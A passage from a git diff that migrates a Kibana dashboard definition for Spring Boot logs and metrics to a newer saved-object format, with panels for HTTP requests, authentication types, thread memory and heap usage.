"id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "12e70c57-6059-400c-974f-b69423d435e9:8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee:indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee:61418bc6-4106-4f91-81ea-1e1071b7c9bb", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "f3782cac-5b20-413c-a88d-cb01ebee5772:indexpattern-datasource-layer-e937f0c4-f880-4837-9315-69d043a3f6b1", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "f3782cac-5b20-413c-a88d-cb01ebee5772:8aabc9bc-b40b-4f3c-b077-c4d19cd6b477", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "b55b6992-8179-4bf9-8e79-8354509a956e:indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "b55b6992-8179-4bf9-8e79-8354509a956e:6502fda4-d554-4b5d-8e8b-e6d3c873901b", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508:indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508:702499ca-434e-41d4-b9a1-1d0bb27b244a", + "id": "metrics-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/spring_boot/kibana/dashboard/spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746.json b/packages/spring_boot/kibana/dashboard/spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746.json index 80437a3a80d..9db88464d5b 100644 --- a/packages/spring_boot/kibana/dashboard/spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746.json +++ b/packages/spring_boot/kibana/dashboard/spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746.json @@ -1,604 +1,1526 @@ { - "attributes": { - "description": "Overview of Spring Boot Application.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2024-01-03T20:12:28.833Z", + "created_at": "2024-01-03T20:12:28.833Z", + "version": "WzEwMiwxXQ==", + "attributes": { + "description": "Overview of Spring Boot Application.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "786d6832-6c69-42e4-916f-df6df259fad1": { + "columnOrder": [ + "575bdfd0-6d2b-4c15-98f1-760a7c18a50a", + "19721a51-8e2d-4e20-993c-b8d31c721d0f" + ], + "columns": { + "19721a51-8e2d-4e20-993c-b8d31c721d0f": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Avg time", + "operationType": "average", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1 + } + } + }, + "scale": "ratio", + "sourceField": "event.duration" + }, + "575bdfd0-6d2b-4c15-98f1-760a7c18a50a": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "1m" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } } - } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "19721a51-8e2d-4e20-993c-b8d31c721d0f" + ], + "layerId": "786d6832-6c69-42e4-916f-df6df259fad1", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "575bdfd0-6d2b-4c15-98f1-760a7c18a50a", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "19721a51-8e2d-4e20-993c-b8d31c721d0f" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true, + "legendSize": "auto" + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Average time taken to handle the HTTP request-response exchange [Logs Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-786d6832-6c69-42e4-916f-df6df259fad1", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 12, + "i": "b55e357e-4c45-430c-ae63-2c6facaabc2e", + "w": 20, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "b55e357e-4c45-430c-ae63-2c6facaabc2e", - "w": 20, - "x": 0, - "y": 0 + "panelIndex": "b55e357e-4c45-430c-ae63-2c6facaabc2e", + "type": "lens", + "version": "8.6.0" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "8da90917-936b-49b2-a845-24db7da4681e", + "w": 9, + "x": 20, + "y": 0 + }, + "panelIndex": "8da90917-936b-49b2-a845-24db7da4681e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "197542f3-0a77-4046-a21d-9e87d097f9d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c": { + "columnOrder": [ + "e65b0651-a054-45ff-9e39-c835bc2e45ee" + ], + "columns": { + "e65b0651-a054-45ff-9e39-c835bc2e45ee": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": " ", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "197542f3-0a77-4046-a21d-9e87d097f9d9", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } }, - "panelIndex": "b55e357e-4c45-430c-ae63-2c6facaabc2e", - "panelRefName": "panel_b55e357e-4c45-430c-ae63-2c6facaabc2e", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", + "key": "http.response.status_code", + "negate": false, + "params": { + "query": 200 + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "http.response.status_code": 200 + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "e65b0651-a054-45ff-9e39-c835bc2e45ee", + "layerId": "25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "197542f3-0a77-4046-a21d-9e87d097f9d9", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total successful requests [Logs Spring Boot]" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "73272b0b-e1d4-4a44-9904-adaad0d24159": { + "columnOrder": [ + "2fe1f301-207a-48ff-aa1c-13aaed31b9db", + "1b8c4683-1d76-49cc-95c8-691612657847" + ], + "columns": { + "1b8c4683-1d76-49cc-95c8-691612657847": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2 + } } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c": { - "columnOrder": [ - "e65b0651-a054-45ff-9e39-c835bc2e45ee" - ], - "columns": { - "e65b0651-a054-45ff-9e39-c835bc2e45ee": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": " ", - "operationType": "count", - "scale": "ratio", - "sourceField": "___records___" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "2fe1f301-207a-48ff-aa1c-13aaed31b9db": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Authentication Type", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "1b8c4683-1d76-49cc-95c8-691612657847", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "197542f3-0a77-4046-a21d-9e87d097f9d9", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.http_trace" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.http_trace" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", - "key": "http.response.status_code", - "negate": false, - "params": { - "query": 200 - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "http.response.status_code": 200 - } - } - } - ], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "accessor": "e65b0651-a054-45ff-9e39-c835bc2e45ee", - "layerId": "25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.type" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.audit_events" }, - "enhancements": {}, - "hidePanelTitles": false, - "type": "lens" - }, - "gridData": { - "h": 6, - "i": "8da90917-936b-49b2-a845-24db7da4681e", - "w": 9, - "x": 20, - "y": 0 - }, - "panelIndex": "8da90917-936b-49b2-a845-24db7da4681e", - "title": "Total successful requests [Logs Spring Boot]", - "type": "lens", - "version": "8.2.0" + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.audit_events" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "73272b0b-e1d4-4a44-9904-adaad0d24159", + "layerType": "data", + "legendDisplay": "show", + "legendMaxLines": 1, + "legendPosition": "bottom", + "nestedLegend": true, + "numberDisplay": "percent", + "truncateLegend": true, + "legendSize": "auto", + "primaryGroups": [ + "2fe1f301-207a-48ff-aa1c-13aaed31b9db" + ], + "metrics": [ + "1b8c4683-1d76-49cc-95c8-691612657847" + ] + } + ], + "shape": "pie" + } }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 18, - "i": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", - "w": 19, - "x": 29, - "y": 0 + "title": "Authentication type [Logs Spring Boot]", + "visualizationType": "lnsPie", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-73272b0b-e1d4-4a44-9904-adaad0d24159", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 18, + "i": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", + "w": 19, + "x": 29, + "y": 0 + }, + "panelIndex": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", + "type": "lens", + "version": "8.6.0" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "44a2b9a5-626c-426b-8bbb-921b56040444", + "w": 9, + "x": 20, + "y": 6 + }, + "panelIndex": "44a2b9a5-626c-426b-8bbb-921b56040444", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a41a8eed-69fe-4838-b8f5-b322f7661832", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0e57fdc9-82ca-45c5-bdfa-57704436ea9a", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "a41a8eed-69fe-4838-b8f5-b322f7661832": { + "columnOrder": [ + "58748aeb-032e-407b-9c76-7e41c419b1a8" + ], + "columns": { + "58748aeb-032e-407b-9c76-7e41c419b1a8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": " ", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } }, - "panelIndex": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", - "panelRefName": "panel_3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "0e57fdc9-82ca-45c5-bdfa-57704436ea9a", + "key": "http.response.status_code", + "negate": true, + "params": { + "query": 200 + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "http.response.status_code": 200 + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "58748aeb-032e-407b-9c76-7e41c419b1a8", + "layerId": "a41a8eed-69fe-4838-b8f5-b322f7661832", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-a41a8eed-69fe-4838-b8f5-b322f7661832", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "0e57fdc9-82ca-45c5-bdfa-57704436ea9a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "a41a8eed-69fe-4838-b8f5-b322f7661832": { - "columnOrder": [ - "58748aeb-032e-407b-9c76-7e41c419b1a8" - ], - "columns": { - "58748aeb-032e-407b-9c76-7e41c419b1a8": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": " ", - "operationType": "count", - "scale": "ratio", - "sourceField": "___records___" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.http_trace" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.http_trace" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0e57fdc9-82ca-45c5-bdfa-57704436ea9a", - "key": "http.response.status_code", - "negate": true, - "params": { - "query": 200 - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "http.response.status_code": 200 - } - } - } - ], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total failed requests [Logs Spring Boot]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "d227dc3c-7902-44e7-b367-36bee05b96ab", + "w": 9, + "x": 20, + "y": 12 + }, + "panelIndex": "d227dc3c-7902-44e7-b367-36bee05b96ab", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-3e8e41c2-e9bd-4bf7-9e82-d478063ca973", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0a93fba6-6f3f-4f2c-a19e-ead075b97111", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "3e8e41c2-e9bd-4bf7-9e82-d478063ca973": { + "columnOrder": [ + "523fb967-5b16-44a7-b663-0f5aa6452db8" + ], + "columns": { + "523fb967-5b16-44a7-b663-0f5aa6452db8": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "spring_boot.threading.threads.current.allocated_bytes : *" + }, + "isBucketed": false, + "label": " ", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } }, - "visualization": { - "accessor": "58748aeb-032e-407b-9c76-7e41c419b1a8", - "layerId": "a41a8eed-69fe-4838-b8f5-b322f7661832", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.threading.threads.current.allocated_bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.threading" }, - "enhancements": {}, - "hidePanelTitles": false, - "type": "lens" - }, - "gridData": { - "h": 6, - "i": "44a2b9a5-626c-426b-8bbb-921b56040444", - "w": 9, - "x": 20, - "y": 6 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.threading" + } + } }, - "panelIndex": "44a2b9a5-626c-426b-8bbb-921b56040444", - "title": "Total failed requests [Logs Spring Boot]", - "type": "lens", - "version": "8.2.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "0a93fba6-6f3f-4f2c-a19e-ead075b97111", + "key": "spring_boot.threading.threads.current.allocated_bytes", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "spring_boot.threading.threads.current.allocated_bytes" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "523fb967-5b16-44a7-b663-0f5aa6452db8", + "colorMode": "None", + "layerId": "3e8e41c2-e9bd-4bf7-9e82-d478063ca973", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-3e8e41c2-e9bd-4bf7-9e82-d478063ca973", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0a93fba6-6f3f-4f2c-a19e-ead075b97111", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "3e8e41c2-e9bd-4bf7-9e82-d478063ca973": { - "columnOrder": [ - "523fb967-5b16-44a7-b663-0f5aa6452db8" - ], - "columns": { - "523fb967-5b16-44a7-b663-0f5aa6452db8": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "spring_boot.threading.threads.current.allocated_bytes : *" - }, - "isBucketed": false, - "label": " ", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "spring_boot.threading.threads.current.allocated_bytes" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total memory of current thread in system [Metrics Spring Boot]" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "31ad067d-6820-43dc-a6fd-7a32a6a121f5": { + "columnOrder": [ + "ce51dd8d-7fd5-4ebf-a835-9ffe83125746", + "07747e2a-9e75-47d8-b1d4-87c0340cf60d", + "9b2297d6-8625-44a3-a7ba-633da40efcfb" + ], + "columns": { + "07747e2a-9e75-47d8-b1d4-87c0340cf60d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Heap Used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.threading" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.threading" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0a93fba6-6f3f-4f2c-a19e-ead075b97111", - "key": "spring_boot.threading.threads.current.allocated_bytes", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "spring_boot.threading.threads.current.allocated_bytes" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.memory.heap.used" + }, + "9b2297d6-8625-44a3-a7ba-633da40efcfb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Non Heap Used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } }, - "visualization": { - "accessor": "523fb967-5b16-44a7-b663-0f5aa6452db8", - "colorMode": "None", - "layerId": "3e8e41c2-e9bd-4bf7-9e82-d478063ca973", - "layerType": "data" - } + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.memory.non_heap.used" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "ce51dd8d-7fd5-4ebf-a835-9ffe83125746": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.memory" }, - "enhancements": {}, - "hidePanelTitles": false, - "type": "lens" - }, - "gridData": { - "h": 6, - "i": "d227dc3c-7902-44e7-b367-36bee05b96ab", - "w": 9, - "x": 20, - "y": 12 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.memory" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "07747e2a-9e75-47d8-b1d4-87c0340cf60d", + "9b2297d6-8625-44a3-a7ba-633da40efcfb" + ], + "layerId": "31ad067d-6820-43dc-a6fd-7a32a6a121f5", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "ce51dd8d-7fd5-4ebf-a835-9ffe83125746" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right", + "showSingleSeries": true }, - "panelIndex": "d227dc3c-7902-44e7-b367-36bee05b96ab", - "title": "Total memory of current thread in system [Metrics Spring Boot]", - "type": "lens", - "version": "8.2.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 17, - "i": "47822937-f8de-43cd-8000-b0c08d933804", - "w": 20, - "x": 0, - "y": 12 + "yRightExtent": { + "mode": "full" }, - "panelIndex": "47822937-f8de-43cd-8000-b0c08d933804", - "panelRefName": "panel_47822937-f8de-43cd-8000-b0c08d933804", - "type": "lens", - "version": "8.1.0" + "yTitle": "Memory" + } }, - { - "embeddableConfig": { - "enhancements": {} + "title": "Heap and non-heap memory [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-31ad067d-6820-43dc-a6fd-7a32a6a121f5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 17, + "i": "47822937-f8de-43cd-8000-b0c08d933804", + "w": 20, + "x": 0, + "y": 12 + }, + "panelIndex": "47822937-f8de-43cd-8000-b0c08d933804", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { + "columnOrder": [ + "2dbf54bf-2147-4302-902b-a176ae9df338", + "21757728-2591-42a8-bed5-10cc5c097d85", + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "columns": { + "21757728-2591-42a8-bed5-10cc5c097d85": { + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code", + "operationType": "range", + "params": { + "maxBars": "auto", + "ranges": [ + { + "from": 0, + "label": "", + "to": 1000 + } + ], + "type": "histogram" + }, + "scale": "interval", + "sourceField": "http.response.status_code" + }, + "2dbf54bf-2147-4302-902b-a176ae9df338": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "1m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "9a043bf0-329d-4632-a095-86760550bd75": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "ba5b5f52-398a-48c9-8021-520aa78ccdba", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 11, - "i": "16610775-6aaa-4759-a3eb-a67c55f5d780", - "w": 28, - "x": 20, - "y": 18 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "16610775-6aaa-4759-a3eb-a67c55f5d780", - "panelRefName": "panel_16610775-6aaa-4759-a3eb-a67c55f5d780", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 14, - "i": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", - "w": 31, - "x": 0, - "y": 29 + "layers": [ + { + "accessors": [ + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "layerType": "data", + "position": "top", + 